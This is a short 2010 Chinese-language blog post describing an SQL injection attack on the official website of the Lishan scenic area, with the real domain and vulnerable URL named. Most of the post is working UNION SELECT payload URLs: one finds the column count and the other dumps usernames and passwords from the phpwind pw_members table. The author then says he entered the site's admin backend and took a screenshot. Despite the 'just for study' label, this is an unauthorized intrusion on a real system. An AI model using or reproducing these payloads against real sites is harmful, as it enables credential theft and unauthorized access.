Web安全检测之骊山到处是垃圾

日期：2010-07-26 ｜来源：redice's Blog ｜作者：redice ｜人围观｜ 1 人鼓掌了！

// by redice 2010.7.26
// redice@163.com
// just for study

昨天终于去了闻名遐迩的骊山，看到了漫山的垃圾...

骊山的官网：http://www.xalishan.com

http://www.xalishan.com/lxs/lxzn.php?c_id=251 注入点之一

（1）确定前一查询的字段数及页面显示哪个字段：
http://www.xalishan.com/lxs/lxzn.php?c_id=251 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21

文章标题对应13字段，文章链接中的id对应1字段

（2）将1和13字段替换为username和password，查询pw_members表（phpwind的用户表）
http://www.xalishan.com/lxs/lxzn.php?c_id=251 and 1=2 union select username,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20,21 FROM pw_members

进后台截图留念：

[日志分享]

| 更多

[日志信息]

该日志于 2010-07-26 09:29 由 redice 发表在 redice's Blog ，你除了可以发表评论外，还可以转载 “Web安全检测之骊山到处是垃圾” 日志到你的网站或博客，但是请保留源地址及作者信息，谢谢!! （尊重他人劳动，你我共同努力）

[相关日志]

如何防止Apache+PHP环境下虚拟主机被旁注？	实测“端口转发神器reDuh-Gui”
Nmap常用参数说明	improve power by ISAPI Filter
[转载]WAF vs IPS 谁更适合防护Web应用	揪出QQ盗号木马-qcat